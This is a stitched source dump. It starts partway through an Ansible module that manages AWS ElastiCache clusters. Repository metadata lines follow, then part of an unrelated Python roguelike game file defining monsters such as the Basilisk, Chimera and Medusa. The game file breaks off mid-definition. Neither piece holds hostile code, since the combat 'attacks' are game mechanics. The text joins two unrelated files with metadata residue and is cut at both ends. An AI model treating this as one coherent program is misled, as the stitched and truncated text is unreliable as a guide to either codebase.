"""Ensure cache cluster exists or create it if not"""
if self.exists():
self.sync()
else:
self.create()
def ensure_absent(self):
"""Ensure cache cluster is gone or delete it if not"""
self.delete()
def ensure_rebooted(self):
"""Ensure cache cluster is gone or delete it if not"""
self.reboot()
def exists(self):
"""Check if cache cluster exists"""
return self.status in self.EXIST_STATUSES
def create(self):
"""Create an ElastiCache cluster"""
if self.status == 'available':
return
if self.status in ['creating', 'rebooting', 'modifying']:
if self.wait:
self._wait_for_status('available')
return
if self.status == 'deleting':
if self.wait:
self._wait_for_status('gone')
else:
msg = "'%s' is currently deleting. Cannot create."
self.module.fail_json(msg=msg % self.name)
try:
response = self.conn.create_cache_cluster(cache_cluster_id=self.name,
num_cache_nodes=self.num_nodes,
cache_node_type=self.node_type,
engine=self.engine,
engine_version=self.cache_engine_version,
cache_security_group_names=self.cache_security_groups,
security_group_ids=self.security_group_ids,
cache_parameter_group_name=self.parameter_group,
cache_subnet_group_name=self.cache_subnet_group,
preferred_availability_zone=self.zone,
port=self.cache_port)
except boto.exception.BotoServerError, e:
self.module.fail_json(msg=e.message)
cache_cluster_data = response['CreateCacheClusterResponse']['CreateCacheClusterResult']['CacheCluster']
self._refresh_data(cache_cluster_data)
self.changed = True
if self.wait:
self._wait_for_status('available')
return True
def delete(self):
"""Destroy an ElastiCache cluster"""
if self.status == 'gone':
return
if self.status == 'deleting':
if self.wait:
self._wait_for_status('gone')
return
if self.status in ['creating', 'rebooting', 'modifying']:
if self.wait:
self._wait_for_status('available')
else:
msg = "'%s' is currently %s. Cannot delete."
self.module.fail_json(msg=msg % (self.name, self.status))
try:
response = self.conn.delete_cache_cluster(cache_cluster_id=self.name)
except boto.exception.BotoServerError, e:
self.module.fail_json(msg=e.message)
cache_cluster_data = response['DeleteCacheClusterResponse']['DeleteCacheClusterResult']['CacheCluster']
self._refresh_data(cache_cluster_data)
self.changed = True
if self.wait:
self._wait_for_status('gone')
def sync(self):
"""Sync settings to cluster if required"""
if not self.exists():
msg = "'%s' is %s. Cannot sync."
self.module.fail_json(msg=msg % (self.name, self.status))
if self.status in ['creating', 'rebooting', 'modifying']:
if self.wait:
self._wait_for_status('available')
else:
# Cluster can only be synced if available. If we can't wait
# for this, then just be done.
return
if self._requires_destroy_and_create():
if not self.hard_modify:
msg = "'%s' requires destructive modification. 'hard_modify' must be set to true to proceed."
self.module.fail_json(msg=msg % self.name)
if not self.wait:
msg = "'%s' requires destructive modification. 'wait' must be set to true."
self.module.fail_json(msg=msg % self.name)
self.delete()
self.create()
return
if self._requires_modification():
self.modify()
def modify(self):
"""Modify the cache cluster. Note it's only possible to modify a few select options."""
nodes_to_remove = self._get_nodes_to_remove()
try:
response = self.conn.modify_cache_cluster(cache_cluster_id=self.name,
num_cache_nodes=self.num_nodes,
cache_node_ids_to_remove=nodes_to_remove,
cache_security_group_names=self.cache_security_groups,
cache_parameter_group_name=self.parameter_group,
security_group_ids=self.security_group_ids,
apply_immediately=True,
engine_version=self.cache_engine_version)
except boto.exception.BotoServerError, e:
self.module.fail_json(msg=e.message)
cache_cluster_data = response['ModifyCacheClusterResponse']['ModifyCacheClusterResult']['CacheCluster']
self._refresh_data(cache_cluster_data)
self.changed = True
if self.wait:
self._wait_for_status('available')
def reboot(self):
"""Reboot the cache cluster"""
if not self.exists():
msg = "'%s' is %s. Cannot reboot."
self.module.fail_json(msg=msg % (self.name, self.status))
if self.status == 'rebooting':
return
if self.status in ['creating', 'modifying']:
if self.wait:
self._wait_for_status('available')
else:
msg = "'%s' is currently %s. Cannot reboot."
self.module.fail_json(msg=msg % (self.name, self.status))
# Collect ALL nodes for reboot
cache_node_ids = [cn['CacheNodeId'] for cn in self.data['CacheNodes']]
try:
response = self.conn.reboot_cache_cluster(cache_cluster_id=self.name,
cache_node_ids_to_reboot=cache_node_ids)
except boto.exception.BotoServerError, e:
self.module.fail_json(msg=e.message)
cache_cluster_data = response['RebootCacheClusterResponse']['RebootCacheClusterResult']['CacheCluster']
self._refresh_data(cache_cluster_data)
self.changed = True
if self.wait:
self._wait_for_status('available')
def get_info(self):
"""Return basic info about the cache cluster"""
info = {
'name': self.name,
'status': self.status
}
if self.data:
info['data'] = self.data
return info
def _wait_for_status(self, awaited_status):
"""Wait for status to change from present status to awaited_status"""
status_map = {
'creating': 'available',
'rebooting': 'available',
'modifying': 'available',
'deleting': 'gone'
}
if self.status == awaited_status:
# No need to wait, we're already done
return
if status_map[self.status] != awaited_status:
msg = "Invalid awaited status. '%s' cannot transition to '%s'"
self.module.fail_json(msg=msg % (self.status, awaited_status))
if awaited_status not in set(status_map.values()):
msg = "'%s' is not a valid awaited status."
self.module.fail_json(msg=msg % awaited_status)
while True:
time.sleep(1)
self._refresh_data()
if self.status == awaited_status:
break
def _requires_modification(self):
"""Check if cluster requires (nondestructive) modification"""
# Check modifiable data attributes
modifiable_data = {
'NumCacheNodes': self.num_nodes,
'EngineVersion': self.cache_engine_version
}
for key, value in modifiable_data.iteritems():
if self.data[key] != value:
return True
# Check cache security groups
cache_security_groups = []
for sg in self.data['CacheSecurityGroups']:
cache_security_groups.append(sg['CacheSecurityGroupName'])
if set(cache_security_groups) - set(self.cache_security_groups):
return True
# check vpc security groups
vpc_security_groups = []
security_groups = self.data['SecurityGroups'] or []
for sg in security_groups:
vpc_security_groups.append(sg['SecurityGroupId'])
if set(vpc_security_groups) - set(self.security_group_ids):
return True
return False
def _requires_destroy_and_create(self):
"""
Check whether a destroy and create is required to synchronize cluster.
"""
unmodifiable_data = {
'node_type': self.data['CacheNodeType'],
'engine': self.data['Engine'],
'cache_port': self._get_port()
}
# Only check for modifications if zone is specified
if self.zone is not None:
unmodifiable_data['zone'] = self.data['PreferredAvailabilityZone']
for key, value in unmodifiable_data.iteritems():
if getattr(self, key) != value:
return True
return False
def _get_elasticache_connection(self):
"""Get an elasticache connection"""
try:
endpoint = "elasticache.%s.amazonaws.com" % self.region
connect_region = RegionInfo(name=self.region, endpoint=endpoint)
return ElastiCacheConnection(
region=connect_region,
**self.aws_connect_kwargs
)
except boto.exception.NoAuthHandlerFound, e:
self.module.fail_json(msg=e.message)
def _get_port(self):
"""Get the port. Where this information is retrieved from is engine dependent."""
if self.data['Engine'] == 'memcached':
return self.data['ConfigurationEndpoint']['Port']
elif self.data['Engine'] == 'redis':
# Redis only supports a single node (presently) so just use
# the first and only
return self.data['CacheNodes'][0]['Endpoint']['Port']
def _refresh_data(self, cache_cluster_data=None):
"""Refresh data about this cache cluster"""
if cache_cluster_data is None:
try:
response = self.conn.describe_cache_clusters(cache_cluster_id=self.name,
show_cache_node_info=True)
except boto.exception.BotoServerError:
self.data = None
self.status = 'gone'
return
cache_cluster_data = response['DescribeCacheClustersResponse']['DescribeCacheClustersResult']['CacheClusters'][0]
self.data = cache_cluster_data
self.status = self.data['CacheClusterStatus']
# The documentation for elasticache lies -- status on rebooting is set
# to 'rebooting cache cluster nodes' instead of 'rebooting'. Fix it
# here to make status checks etc. more sane.
if self.status == 'rebooting cache cluster nodes':
self.status = 'rebooting'
def _get_nodes_to_remove(self):
"""If there are nodes to remove, it figures out which need to be removed"""
num_nodes_to_remove = self.data['NumCacheNodes'] - self.num_nodes
if num_nodes_to_remove <= 0:
return None
if not self.hard_modify:
msg = "'%s' requires removal of cache nodes. 'hard_modify' must be set to true to proceed."
self.module.fail_json(msg=msg % self.name)
cache_node_ids = [cn['CacheNodeId'] for cn in self.data['CacheNodes']]
return cache_node_ids[-num_nodes_to_remove:]
def main():
argument_spec = ec2_argument_spec()
default = object()
argument_spec.update(dict(
state={'required': True, 'choices': ['present', 'absent', 'rebooted']},
name={'required': True},
engine={'required': False, 'default': 'memcached'},
cache_engine_version={'required': False},
node_type={'required': False, 'default': 'cache.m1.small'},
num_nodes={'required': False, 'default': None, 'type': 'int'},
parameter_group={'required': False, 'default': None},
cache_port={'required': False, 'type': 'int'},
cache_subnet_group={'required': False, 'default': None},
cache_security_groups={'required': False, 'default': [default],
'type': 'list'},
security_group_ids={'required': False, 'default': [],
'type': 'list'},
zone={'required': False, 'default': None},
wait={'required': False, 'type' : 'bool', 'default': True},
hard_modify={'required': False, 'type': 'bool', 'default': False}
)
)
module = AnsibleModule(
argument_spec=argument_spec,
)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module)
name = module.params['name']
state = module.params['state']
engine = module.params['engine']
cache_engine_version = module.params['cache_engine_version']
node_type = module.params['node_type']
num_nodes = module.params['num_nodes']
cache_port = module.params['cache_port']
cache_subnet_group = module.params['cache_subnet_group']
cache_security_groups = module.params['cache_security_groups']
security_group_ids = module.params['security_group_ids']
zone = module.params['zone']
wait = module.params['wait']
hard_modify = module.params['hard_modify']
parameter_group = module.params['parameter_group']
if cache_subnet_group and cache_security_groups == [default]:
cache_security_groups = []
if cache_subnet_group and cache_security_groups:
module.fail_json(msg="Can't specify both cache_subnet_group and cache_security_groups")
if cache_security_groups == [default]:
cache_security_groups = ['default']
if state == 'present' and not num_nodes:
module.fail_json(msg="'num_nodes' is a required parameter. Please specify num_nodes > 0")
if not region:
module.fail_json(msg=str("Either region or AWS_REGION or EC2_REGION environment variable or boto config aws_region or ec2_region must be set."))
elasticache_manager = ElastiCacheManager(module, name, engine,
cache_engine_version, node_type,
num_nodes, cache_port,
cache_subnet_group,
cache_security_groups,
security_group_ids, parameter_group, zone, wait,
hard_modify, region, **aws_connect_kwargs)
if state == 'present':
elasticache_manager.ensure_present()
elif state == 'absent':
elasticache_manager.ensure_absent()
elif state == 'rebooted':
elasticache_manager.ensure_rebooted()
facts_result = dict(changed=elasticache_manager.changed,
elasticache=elasticache_manager.get_info())
module.exit_json(**facts_result)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
main()
|
ConZ27/ansible-modules-core
|
cloud/amazon/elasticache.py
|
Python
|
gpl-3.0
| 21,857
|
[
"Dalton"
] |
e7dba32494cf6a1c1ff0cc23c3ee2774475d2a861bb6ad27fe3ccebb72b69e87
|
from . import base
from .. import stats
from .. import items
from .. import dialogue
from .. import context
from .. import spells
from .. import invocations
from .. import effects
from .. import animobs
from .. import targetarea
from .. import aibrain
from . import animals
from . import treasuretype
from . import abilities
from .. import enchantments
# Contains critters that don't quite fit in anywhere else.
# *******************************
# *** ENCOUNTER LEVEL 1 ***
# *******************************
# *******************************
# *** ENCOUNTER LEVEL 2 ***
# *******************************
# *******************************
# *** ENCOUNTER LEVEL 3 ***
# *******************************
class EvilEye( base.Monster ):
name = "Evil Eye"
statline = { stats.STRENGTH: 6, stats.TOUGHNESS: 12, stats.REFLEXES: 12, \
stats.INTELLIGENCE: 10, stats.PIETY: 10, stats.CHARISMA: 2, \
stats.MAGIC_ATTACK: 20, stats.MAGIC_DEFENSE: 10 }
SPRITENAME = "monster_default.png"
FRAME = 18
TEMPLATES = ()
MOVE_POINTS = 6
VOICE = None
HABITAT = ( context.HAB_CAVE, context.HAB_TUNNELS, context.SET_EVERY,
context.DES_LUNAR, context.MTY_BOSS,
context.MTY_BEAST, context.GEN_CHAOS )
ENC_LEVEL = 3
ATTACK = items.Attack( (2,4,0), element = stats.RESIST_LUNAR,
skill_mod=stats.REFLEXES, hit_anim=animobs.PurpleExplosion, extra_effect =
effects.OpposedRoll( att_stat=stats.REFLEXES, def_stat=stats.REFLEXES, on_success = (
effects.Paralyze( max_duration = 3 )
,) )
)
TECHNIQUES = ( invocations.MPInvocation( "Evil Gaze",
effects.OpposedRoll( att_stat=stats.REFLEXES, def_stat=stats.REFLEXES, att_modifier=10, on_success = (
effects.Paralyze( max_duration = 3 )
,), on_failure = (
effects.NoEffect( anim=animobs.SmallBoom )
,) ), com_tar=targetarea.SingleTarget(reach=4), shot_anim=animobs.PurpleVortex,
ai_tar=invocations.TargetMobileEnemy(), mp_cost=3
), )
def init_monster( self ):
self.levels.append( base.Beast( 3, self ) )
# *******************************
# *** ENCOUNTER LEVEL 4 ***
# *******************************
class Cockatrice( base.Monster ):
name = "Cockatrice"
statline = { stats.STRENGTH: 8, stats.TOUGHNESS: 8, stats.REFLEXES: 15, \
stats.INTELLIGENCE: 1, stats.PIETY: 10, stats.CHARISMA: 4 }
SPRITENAME = "monster_default.png"
FRAME = 21
TEMPLATES = ()
MOVE_POINTS = 10
VOICE = None
HABITAT = ( context.HAB_EVERY, context.SET_EVERY, context.SET_RENFAN,
context.DES_AIR, context.DES_EARTH,
context.MTY_BEAST, context.MTY_BOSS )
ENC_LEVEL = 4
COMPANIONS = (animals.Chicken,)
ATTACK = items.Attack( (1,6,0), element = stats.RESIST_PIERCING, skill_mod=stats.REFLEXES )
TECHNIQUES = ( invocations.MPInvocation( "Death Gaze",
effects.OpposedRoll( att_stat=stats.PIETY, att_modifier=-10, on_success = (
effects.InstaKill( anim=animobs.CriticalHit )
,), on_failure = (
effects.NoEffect( anim=animobs.SmallBoom )
,) ), com_tar=targetarea.SingleTarget(reach=4), shot_anim=animobs.PurpleVortex, ai_tar=invocations.TargetEnemy(), mp_cost=4
), )
def init_monster( self ):
self.levels.append( base.Beast( 3, self ) )
class CorpseEater( base.Monster ):
name = "Corpse Eater"
statline = { stats.STRENGTH: 12, stats.TOUGHNESS: 14, stats.REFLEXES: 8, \
stats.INTELLIGENCE: 2, stats.PIETY: 12, stats.CHARISMA: 2 }
SPRITENAME = "monster_default.png"
FRAME = 13
TEMPLATES = (stats.BUG,)
MOVE_POINTS = 8
VOICE = None
HABITAT = ( context.HAB_EVERY, context.HAB_TUNNELS, context.SET_EVERY,
context.MAP_DUNGEON,
context.DES_LUNAR,
context.MTY_BEAST )
ENC_LEVEL = 4
ATTACK = items.Attack( (3,4,0), element = stats.RESIST_PIERCING, extra_effect =
effects.OpposedRoll( att_stat=stats.TOUGHNESS, on_success = (
effects.Paralyze( max_duration = 6 )
,) )
)
TECHNIQUES = ( invocations.MPInvocation( "Tentacle Slime",
effects.TargetIsEnemy( on_true = (
effects.OpposedRoll( anim=animobs.GreenSplat, att_stat=stats.TOUGHNESS, on_success = (
effects.Paralyze( max_duration = 3 )
,), on_failure = (
effects.NoEffect( anim=animobs.SmallBoom )
,) ),
)
), com_tar=targetarea.SelfCentered(radius=1,exclude_middle=True), ai_tar=invocations.TargetEnemy(), mp_cost=8 ), )
def init_monster( self ):
self.levels.append( base.Beast( 4, self ) )
# *******************************
# *** ENCOUNTER LEVEL 5 ***
# *******************************
class Gargoyle( base.Monster ):
name = "Gargoyle"
statline = { stats.STRENGTH: 15, stats.TOUGHNESS: 18, stats.REFLEXES: 14, \
stats.INTELLIGENCE: 6, stats.PIETY: 11, stats.CHARISMA: 7,
stats.RESIST_CRUSHING: 50, stats.RESIST_PIERCING: 50,
stats.RESIST_SLASHING: 50, stats.PHYSICAL_ATTACK: 10, stats.NATURAL_DEFENSE: 5 }
SPRITENAME = "monster_default.png"
FRAME = 22
TEMPLATES = (stats.EARTH,stats.ROCK)
MOVE_POINTS = 16
HABITAT = ( context.HAB_EVERY, context.SET_EVERY,
context.MTY_BOSS,
context.MAP_DUNGEON, context.DES_EARTH )
ENC_LEVEL = 5
TREASURE = treasuretype.Standard()
ATTACK = items.Attack( (2,4,0), element = stats.RESIST_SLASHING )
TECHNIQUES = ()
def init_monster( self ):
self.levels.append( base.Humanoid( 4, self ) )
# *******************************
# *** ENCOUNTER LEVEL 6 ***
# *******************************
class Basilisk( base.Monster ):
name = "Basilisk"
statline = { stats.STRENGTH: 15, stats.TOUGHNESS: 15, stats.REFLEXES: 8, \
stats.INTELLIGENCE: 2, stats.PIETY: 12, stats.CHARISMA: 11 }
SPRITENAME = "monster_default.png"
FRAME = 39
TEMPLATES = (stats.REPTILE,)
MOVE_POINTS = 8
VOICE = None
HABITAT = ( context.HAB_EVERY, context.SET_EVERY,
context.MTY_BEAST, context.MTY_BOSS )
ENC_LEVEL = 6
ATTACK = items.Attack( (1,8,0), element = stats.RESIST_PIERCING )
TECHNIQUES = ( invocations.MPInvocation( "Death Gaze",
effects.OpposedRoll( att_stat=stats.PIETY, att_modifier=-10, on_success = (
effects.InstaKill( anim=animobs.CriticalHit )
,), on_failure = (
effects.NoEffect( anim=animobs.SmallBoom )
,) ), com_tar=targetarea.SingleTarget(reach=4), shot_anim=animobs.PurpleVortex, ai_tar=invocations.TargetEnemy(), mp_cost=6
), )
def init_monster( self ):
self.levels.append( base.Beast( 6, self ) )
class Griffin( base.Monster ):
name = "Griffin"
statline = { stats.STRENGTH: 18, stats.TOUGHNESS: 16, stats.REFLEXES: 15, \
stats.INTELLIGENCE: 5, stats.PIETY: 13, stats.CHARISMA: 8,
stats.PHYSICAL_ATTACK: 5, stats.NATURAL_DEFENSE: 5, stats.MAGIC_DEFENSE: 5 }
SPRITENAME = "monster_default.png"
FRAME = 35
TEMPLATES = ()
MOVE_POINTS = 12
HABITAT = ( context.HAB_EVERY, context.SET_EVERY,
context.MAP_WILDERNESS, context.DES_AIR,
context.MTY_BEAST, context.GEN_NATURE )
ENC_LEVEL = 6
TREASURE = None
ATTACK = items.Attack( (2,6,0), element = stats.RESIST_SLASHING )
TECHNIQUES = ()
def init_monster( self ):
self.levels.append( base.Beast( 7, self ) )
class Harpy( base.Monster ):
name = "Harpy"
statline = { stats.STRENGTH: 10, stats.TOUGHNESS: 10, stats.REFLEXES: 15, \
stats.INTELLIGENCE: 7, stats.PIETY: 12, stats.CHARISMA: 17 }
SPRITENAME = "monster_default.png"
FRAME = 38
TEMPLATES = ()
MOVE_POINTS = 8
VOICE = dialogue.voice.GREEK
HABITAT = ( context.HAB_EVERY, context.HAB_CAVE, context.SET_EVERY,
context.DES_LUNAR,
context.MTY_HUMANOID, context.MTY_BOSS, context.GEN_CHAOS )
ENC_LEVEL = 6
TREASURE = treasuretype.Standard()
ATTACK = items.Attack( (2,4,0), element = stats.RESIST_SLASHING )
TECHNIQUES = (invocations.MPInvocation( "Sleep Song",
effects.TargetIsEnemy( anim=animobs.SonicHit, on_true = (
effects.TargetIs( pat=effects.ANIMAL, on_true = (
effects.OpposedRoll( att_modifier=0, on_success = (
effects.CauseSleep(),
)),)
,), )), com_tar=targetarea.SelfCentered(radius=6,delay_from=-1),
ai_tar=invocations.TargetMobileEnemy(), mp_cost=8 ),
)
def init_monster( self ):
self.levels.append( base.Humanoid( 7, self ) )
class Owlbear( base.Monster ):
name = "Owlbear"
statline = { stats.STRENGTH: 21, stats.TOUGHNESS: 21, stats.REFLEXES: 12, \
stats.INTELLIGENCE: 2, stats.PIETY: 12, stats.CHARISMA: 10 }
SPRITENAME = "monster_default.png"
FRAME = 27
TEMPLATES = ()
MOVE_POINTS = 10
HABITAT = ( context.HAB_EVERY, context.SET_EVERY,
context.MAP_WILDERNESS,
context.MTY_BEAST, context.GEN_NATURE )
ENC_LEVEL = 6
TREASURE = None
ATTACK = items.Attack( (1,8,0), element = stats.RESIST_SLASHING )
TECHNIQUES = ()
def init_monster( self ):
self.levels.append( base.Beast( 6, self ) )
# *******************************
# *** ENCOUNTER LEVEL 7 ***
# *******************************
class Lamia( base.Monster ):
name = "Lamia"
statline = { stats.STRENGTH: 18, stats.TOUGHNESS: 12, stats.REFLEXES: 15, \
stats.INTELLIGENCE: 13, stats.PIETY: 15, stats.CHARISMA: 12 }
SPRITENAME = "monster_default.png"
FRAME = 2
TEMPLATES = ()
MOVE_POINTS = 10
VOICE = dialogue.voice.GREEK
HABITAT = ( context.HAB_EVERY, context.HAB_DESERT, context.SET_EVERY,
context.DES_LUNAR,
context.MTY_HUMANOID, context.MTY_BOSS )
ENC_LEVEL = 7
TREASURE = treasuretype.HighItems()
ATTACK = items.Attack( (1,6,0), element = stats.RESIST_SLASHING, extra_effect=
effects.StatDamage( stats.PIETY, amount=4, anim=animobs.GreenBoom )
)
TECHNIQUES = ( invocations.MPInvocation( "Spirit Drain",
effects.TargetIsEnemy( on_true = (
effects.OpposedRoll( on_success = (
effects.ManaDamage( (1,8,0), stat_bonus=stats.TOUGHNESS, anim=animobs.PurpleExplosion ),
effects.CauseSleep()
,), on_failure = (
effects.ManaDamage( (1,8,0), stat_bonus=None, anim=animobs.PurpleExplosion )
,)),), on_false= (
effects.NoEffect( anim=animobs.PurpleExplosion )
,)), com_tar=targetarea.Cone(reach=4), ai_tar=invocations.TargetEnemy(), mp_cost=12
), )
def init_monster( self ):
self.levels.append( base.Humanoid( 8, self ) )
class Manticore( base.Monster ):
name = "Manticore"
statline = { stats.STRENGTH: 20, stats.TOUGHNESS: 19, stats.REFLEXES: 15, \
stats.INTELLIGENCE: 7, stats.PIETY: 12, stats.CHARISMA: 9 }
SPRITENAME = "monster_default.png"
FRAME = 26
TEMPLATES = ()
MOVE_POINTS = 12
HABITAT = ( context.HAB_EVERY, context.SET_EVERY,
context.MAP_WILDERNESS, context.MTY_BEAST, context.MTY_BOSS )
ENC_LEVEL = 7
COMBAT_AI = aibrain.ArcherAI()
TREASURE = treasuretype.Standard()
ATTACK = items.Attack( (2,4,0), element = stats.RESIST_PIERCING, extra_effect=abilities.POISON_ATTACK )
TECHNIQUES = (invocations.MPInvocation( "Tail Spikes",
effects.NoEffect( children=(
effects.PhysicalAttackRoll( att_stat=stats.REFLEXES, att_modifier=5, on_success = (
effects.HealthDamage( (1,8,0), stat_bonus=stats.STRENGTH, element=stats.RESIST_PIERCING, anim=animobs.RedBoom ),
), on_failure = (
effects.NoEffect( anim=animobs.SmallBoom ),
)),
effects.PhysicalAttackRoll( att_stat=stats.REFLEXES, att_modifier=5, on_success = (
effects.HealthDamage( (1,8,0), stat_bonus=stats.STRENGTH, element=stats.RESIST_PIERCING, anim=animobs.RedBoom ),
), on_failure = (
effects.NoEffect( anim=animobs.SmallBoom ),
) ),
effects.PhysicalAttackRoll( att_stat=stats.REFLEXES, att_modifier=5, on_success = (
effects.HealthDamage( (1,8,0), stat_bonus=stats.STRENGTH, element=stats.RESIST_PIERCING, anim=animobs.RedBoom ),
), on_failure = (
effects.NoEffect( anim=animobs.SmallBoom ),
) ),
effects.PhysicalAttackRoll( att_stat=stats.REFLEXES, att_modifier=5, on_success = (
effects.HealthDamage( (1,8,0), stat_bonus=stats.STRENGTH, element=stats.RESIST_PIERCING, anim=animobs.RedBoom ),
), on_failure = (
effects.NoEffect( anim=animobs.SmallBoom ),
) ),
),), mp_cost=10, com_tar=targetarea.SingleTarget(reach=9), shot_anim=animobs.GoldStone, ai_tar=invocations.TargetEnemy()
),
)
def init_monster( self ):
self.levels.append( base.Beast( 6, self ) )
# *******************************
# *** ENCOUNTER LEVEL 8 ***
# *******************************
# Megaraptor
class Wyvern( base.Monster ):
name = "Wyvern"
statline = { stats.STRENGTH: 19, stats.TOUGHNESS: 15, stats.REFLEXES: 12, \
stats.INTELLIGENCE: 6, stats.PIETY: 12, stats.CHARISMA: 9 }
SPRITENAME = "monster_default.png"
FRAME = 44
TEMPLATES = (stats.DRAGON,)
MOVE_POINTS = 10
HABITAT = ( context.HAB_EVERY, context.SET_EVERY,
context.MAP_WILDERNESS,
context.MTY_BEAST, context.GEN_DRAGON )
ENC_LEVEL = 8
TREASURE = treasuretype.Standard()
ATTACK = items.Attack( (2,6,0), element = stats.RESIST_PIERCING,
extra_effect=abilities.POISON_ATTACK_1d8 )
TECHNIQUES = ()
def init_monster( self ):
self.levels.append( base.Terror( 8, self ) )
# *******************************
# *** ENCOUNTER LEVEL 9 ***
# *******************************
class Chimera( base.Monster ):
name = "Chimera"
# This is based on the version from the Pathfinder SRD rather than the
# regular SRD; the only difference is the beefed-up breath weapon.
statline = { stats.STRENGTH: 19, stats.TOUGHNESS: 17, stats.REFLEXES: 13, \
stats.INTELLIGENCE: 4, stats.PIETY: 13, stats.CHARISMA: 10,
stats.AWARENESS: 50 }
SPRITENAME = "monster_by_Joe.png"
FRAME = 0
TEMPLATES = ()
MOVE_POINTS = 12
VOICE = dialogue.voice.GREEK
HABITAT = ( context.HAB_EVERY, context.SET_EVERY, context.DES_FIRE,
context.MTY_BEAST, context.GEN_CHAOS, context.MTY_BOSS )
ENC_LEVEL = 9
TREASURE = treasuretype.Standard()
ATTACK = items.Attack( (2,8,0), element = stats.RESIST_PIERCING )
TECHNIQUES = ( invocations.MPInvocation( "Fire Breath",
effects.OpposedRoll( att_stat=stats.REFLEXES, def_stat=stats.REFLEXES, on_success = (
effects.HealthDamage( (6,8,0), stat_bonus=stats.TOUGHNESS, element=stats.RESIST_FIRE, anim=animobs.RedCloud )
,), on_failure = (
effects.HealthDamage( (3,8,0), stat_bonus=None, element=stats.RESIST_FIRE, anim=animobs.RedCloud )
,) ), com_tar=targetarea.Cone(reach=4), ai_tar=invocations.TargetEnemy(), mp_cost=16
), )
def init_monster( self ):
self.levels.append( base.Terror( 9, self ) )
class Medusa( base.Monster ):
name = "Medusa"
statline = { stats.STRENGTH: 10, stats.TOUGHNESS: 12, stats.REFLEXES: 15, \
stats.INTELLIGENCE: 12, stats.PIETY: 13, stats.CHARISMA: 15 }
SPRITENAME = "monster_default.png"
FRAME = 30
TEMPLATES = ()
MOVE_POINTS = 10
VOICE = dialogue.voice.GREEK
HABITAT = ( context.HAB_EVERY, context.SET_EVERY,
context.MTY_HUMANOID )
ENC_LEVEL = 9
COMBAT_AI = aibrain.ArcherAI(approach_allies=0,technique_chance=75)
ATTACK = items.Attack( (1,6,0), element = stats.RESIST_PIERCING, extra_effect=abilities.POISON_ATTACK_2d6 )
TECHNIQUES = ( invocations.MPInvocation( "Death Gaze",
effects.OpposedRoll( att_stat=stats.PIETY, att_modifier=-10, on_success = (
effects.InstaKill( anim=animobs.CriticalHit )
,), on_failure = (
effects.NoEffect( anim=animobs.SmallBoom )
,) ), com_tar=targetarea.SingleTarget(reach=6), shot_anim=animobs.PurpleVortex, ai_tar=invocations.TargetEnemy(), mp_cost=9
), abilities.LONGBOW )
def init_monster( self ):
self.levels.append( base.Humanoid( 6, self ) )
class Umbull( base.Monster ):
name = "Umbull"
statline = { stats.STRENGTH: 23, stats.TOUGHNESS: 19, stats.REFLEXES: 13, \
stats.INTELLIGENCE: 9, stats.PIETY: 11, stats.CHARISMA: 13 }
SPRITENAME = "monster_default.png"
FRAME = 4
TEMPLATES = ()
MOVE_POINTS = 8
HABITAT = ( context.HAB_CAVE, context.SET_EVERY,
context.MAP_DUNGEON, context.DES_EARTH )
ENC_LEVEL = 9
COMBAT_AI = aibrain.BruiserAI()
TREASURE = treasuretype.Standard()
ATTACK = items.Attack( (3,6,0), element = stats.RESIST_SLASHING )
TECHNIQUES = (invocations.Invocation( "Freezing Gaze",
effects.OpposedRoll( att_modifier=20, on_success = (
effects.Paralyze( max_duration = 6 )
,), on_failure =(
effects.NoEffect( anim=animobs.SmallBoom )
,) ), com_tar=targetarea.SingleTarget(), shot_anim=animobs.PurpleVortex,
ai_tar=invocations.TargetMobileEnemy() ),
)
def init_monster( self ):
self.levels.append( base.Defender( 9, self ) )
# ********************************
# *** ENCOUNTER LEVEL 10 ***
# ********************************
class Sphinx( base.Monster ):
name = "Sphinx"
statline = { stats.STRENGTH: 19, stats.TOUGHNESS: 13, stats.REFLEXES: 12, \
stats.INTELLIGENCE: 18, stats.PIETY: 19, stats.CHARISMA: 19, \
stats.NATURAL_DEFENSE: 15 }
SPRITENAME = "monster_default.png"
FRAME = 37
TEMPLATES = ()
MOVE_POINTS = 12
VOICE = dialogue.voice.GREEK
HABITAT = ( context.HAB_DESERT, context.SET_EVERY,
context.MAP_WILDERNESS,
context.DES_SOLAR,
context.MTY_HUMANOID, context.MTY_LEADER, context.MTY_BOSS )
ENC_LEVEL = 10
TREASURE = treasuretype.High()
ATTACK = items.Attack( (2,6,4), element = stats.RESIST_SLASHING )
TECHNIQUES = ( spells.lunarspells.DEATH_RAY, spells.airspells.DISPEL_MAGIC,
spells.priestspells.SANCTUARY, spells.solarspells.REMOVE_CURSE,
spells.solarspells.MASS_CURE )
def init_monster( self ):
self.levels.append( base.Terror( 8, self ) )
class Behir( base.Monster ):
name = "Behir"
statline = { stats.STRENGTH: 26, stats.TOUGHNESS: 21, stats.REFLEXES: 13, \
stats.INTELLIGENCE: 7, stats.PIETY: 14, stats.CHARISMA: 12, \
stats.RESIST_LIGHTNING: 150, stats.AWARENESS: 50, stats.CRITICAL_HIT: 10 }
SPRITENAME = "monster_by_Joe.png"
FRAME = 5
TEMPLATES = ()
MOVE_POINTS = 12
HABITAT = ( context.HAB_EVERY, context.SET_EVERY,
context.MAP_DUNGEON,
context.DES_AIR,
context.MTY_BOSS )
ENC_LEVEL = 10
TREASURE = treasuretype.Swallowed(scale=1,swag_chance=20)
ATTACK = items.Attack( (2,4,0), element = stats.RESIST_PIERCING )
TECHNIQUES = ( invocations.MPInvocation( "Lightning Breath",
effects.OpposedRoll( att_stat=stats.REFLEXES, def_stat=stats.REFLEXES, on_success = (
effects.HealthDamage( (7,6,0), stat_bonus=None, element=stats.RESIST_LIGHTNING, anim=animobs.Spark )
,), on_failure = (
effects.HealthDamage( (3,7,0), stat_bonus=None, element=stats.RESIST_LIGHTNING, anim=animobs.Spark )
,) ), com_tar=targetarea.Line(reach=5), ai_tar=invocations.TargetEnemy(), mp_cost=30
), )
def init_monster( self ):
self.levels.append( base.Terror( 9, self ) )
# ********************************
# *** ENCOUNTER LEVEL 11 ***
# ********************************
class Hydra( base.Monster ):
name = "Hydra"
statline = { stats.STRENGTH: 21, stats.TOUGHNESS: 20, stats.REFLEXES: 12, \
stats.INTELLIGENCE: 3, stats.PIETY: 10, stats.CHARISMA: 9,
stats.PHYSICAL_ATTACK: 20 }
SPRITENAME = "monster_default.png"
FRAME = 3
TEMPLATES = (stats.REPTILE,stats.EARTH,)
MOVE_POINTS = 8
HABITAT = ( context.HAB_EVERY, context.SET_EVERY,
